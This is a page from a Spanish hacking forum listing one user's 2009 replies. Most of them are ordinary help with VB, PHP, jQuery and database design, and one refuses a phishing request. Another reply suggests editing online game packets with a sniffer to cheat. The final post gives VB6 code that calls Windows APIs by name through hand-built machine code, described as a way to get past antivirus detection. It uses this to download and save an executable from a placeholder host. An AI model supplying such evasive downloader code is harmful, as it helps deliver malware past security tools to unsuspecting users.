elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 ... 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 [77] 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 ... 106
761  Programación / Programación Visual Basic / Re: ID en base de datos en: 19 Junio 2009, 23:47 pm
Pues no entiendo muy bien del todo cual es tu problema la verdad, pero si quieres relacionar un albarán y un recibo porque no usas una tabla intermedia y creas una relación?

Albarán ------------- corresponde -------------recibo
idalbaran                  ida - idr                      idrecibo

En la relación guardas el id de cada  uno de ellos y cuando quieras saber que albarán corresponde con qué recibo solo tienes que consultar la tabla corresponde. Es como siempre se ha hecho no?

De todos modos no sé si entendí del todo bien tu pregunta.
762  Foros Generales / Foro Libre / Re: ¿Cuántas asignaturas me pueden quedar en 4º para ir a Bachillerato? en: 19 Junio 2009, 19:18 pm
Que yo sepa, para que te den el título de la ESO no te puede quedar ninguna. Otra cosa es que si sólo te queda una te la aprueben los profesores para hacerte el favor, pero para tener el título has de aprobar todo, sea cual sea la asignatura.

763  Programación / PHP / Re: Codigo que guarde datos en una web en: 14 Junio 2009, 10:37 am
Quieres robar nombres de usuario y contraseña a la gente haciendo phishing y encima quieres que te den el código hecho?

¿Sabes que el pishing es un delito?, no vuelvas a pedir que te hagan el trabajo y mucho menos para cometer un delito...
764  Programación / PHP / Re: Leer y escribir datos boleanos con PHP y MySQL en: 14 Junio 2009, 10:29 am
Una pregunta, esto son tus deberes?
765  Programación / PHP / Re: Como actualizar un formulario en php!! en: 12 Junio 2009, 12:10 pm
Eso con jQuery se hace en una línea:

$('#divResultado').load('PaginaAcargar.php?ejemplo=1');

Saludos!

mentira, se hace con un buen de lineas.
es como si nada mas pongo, mostrar(serverPage,objID).

jquery es para flojos

Perdona que te diga pero te equivocas. Primero no me llames mentiroso, no creas que lo sabes todo, de hecho si hubieses usado jQuery sabrías que no es mentira, con esa única línea hace exactamente lo mismo que todo el código que tú has puesto. Obviamente porque jQuery ya trae implementado un objeto AJAX con el que trabajar pero eso al programador le da lo mismo así que obtiene el mismo resultado que tú con una sola línea.

Y por cierto eso de "jQuery es para flojos" creo que sin comentarios.. nunca he visto tanta ignorancia junta en un mismo post.. xD
766  Programación / Programación Visual Basic / Re: [Ayuda]Programa Que Envie Paquetes Hexadecimales Por Medio De Winsok en: 9 Junio 2009, 08:03 am
men hay puse el codigo que consegui .. pero cuando le envio el codigo me dice ''El Archivo No Existe'' Pero Cuando Pongo Un Archivo Si Lo Manda ^ La Idea Es Mandar Codigos Ejemplo : C1 03 BC 48 DA

Empieza por aprender a programar y cuando tengas dudas de verdad preguntas...
767  Programación / PHP / Re: Como almacenar una variable que contiene comillas dobles? en: 9 Junio 2009, 08:01 am
$variable=ereg_replace("\"", """,$variable);

echo $variable;
768  Programación / Programación Visual Basic / Re: Llenar escritorio de formularios en: 8 Junio 2009, 16:20 pm
Código
  1. Private Sub Command1_Click()
  2.    Dim xForm As Form
  3.    Set xForm = New Form1
  4.    xForm.Show
  5. End Sub

No creo que te sea muy complicado convertir eso en un bucle verdad?

Saludos!
769  Programación / Programación Visual Basic / Re: [AYUDA]PRograma .exe Que Mande Paketes en: 7 Junio 2009, 23:03 pm
Es inútil la edición de direcciones de memoria en un juego online ya que los valores como salud, dinero, maná, etc etc etc están alojados del lado del servidor y no del cliente por lo que hagas lo que hagas con las direcciones de memoria tu salud, dinero y demás no va a cambiar. Puede que en el juego llegues a editar por ejemplo si tenías 900 de salud poner 9000. En el cliente lo pondrá, pero cuando te golpeen y te quiten 900 vas a morir ya que tu cliente solicita la salud continuamente al servidor y cuando llega a 0 tu salud real mueres.

Osea que eso sirve perfectamente para un juego offline, pero tengo entendido que ese MU es Online por lo que editar memoria no creo que te sirva para nada. Para editar paquetes usa un sniffer como WPE Pro. Editando paquetes y reenviandolos editados si puede que consigas alguna cosa curiosa (yo alguna vez he conseguido cosas interesantes interceptando y editando paquetes en juegos online xD).

Un saludo
770  Programación / Programación Visual Basic / Re: Descargar .exe desde VB en: 7 Junio 2009, 15:32 pm
Veo que sigues sin usar mucho el buscador del foro

Hay una función hecha por Cobein buenísima que llama a una API directamente por su nombre, esto dificulta su detección por los antivirus y llamando de esta forma a la API URLDownloadToFileW no hay problema alguno para descargar un fichero.

Módulo:

Código
  1. 'Call API Function
  2. 'Credits to Cobein
  3.  
  4. Declare Sub RtlMoveMemory Lib "kernel32" (dest As Any, src As Any, ByVal L As Long)
  5. Declare Function CallWindowProcA Lib "user32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
  6. Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
  7. Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
  8.  
  9. Function CallApiByName(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
  10. On Error Resume Next
  11.    Dim lPtr                As Long
  12.    Dim bvASM(&HEC00& - 1)  As Byte
  13.    Dim I                   As Long
  14.    Dim lMod                As Long
  15.  
  16.    lMod = GetProcAddress(LoadLibraryA(sLib), sMod)
  17.    If lMod = 0 Then Exit Function
  18.  
  19.    lPtr = VarPtr(bvASM(0))
  20.    RtlMoveMemory ByVal lPtr, &H59595958, &H4:              lPtr = lPtr + 4
  21.    RtlMoveMemory ByVal lPtr, &H5059, &H2:                  lPtr = lPtr + 2
  22.    For I = UBound(Params) To 0 Step -1
  23.        RtlMoveMemory ByVal lPtr, &H68, &H1:                lPtr = lPtr + 1
  24.        RtlMoveMemory ByVal lPtr, CLng(Params(I)), &H4:     lPtr = lPtr + 4
  25.    Next
  26.    RtlMoveMemory ByVal lPtr, &HE8, &H1:                    lPtr = lPtr + 1
  27.    RtlMoveMemory ByVal lPtr, lMod - lPtr - 4, &H4:         lPtr = lPtr + 4
  28.    RtlMoveMemory ByVal lPtr, &HC3, &H1:                    lPtr = lPtr + 1
  29.    CallApiByName = CallWindowProcA(VarPtr(bvASM(0)), 0, 0, 0, 0)
  30.  
  31. End Function

Form:

Código
  1. Private Sub Form_Load()
  2.   lRet = CallApiByName("urlmon", "URLDownloadToFileW", 0, StrPtr("http://server.com/test.exe"), StrPtr("C:\test.exe"), 0, 0)
  3. End Sub

Saludos!
Páginas: 1 ... 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 [77] 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 ... 106
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines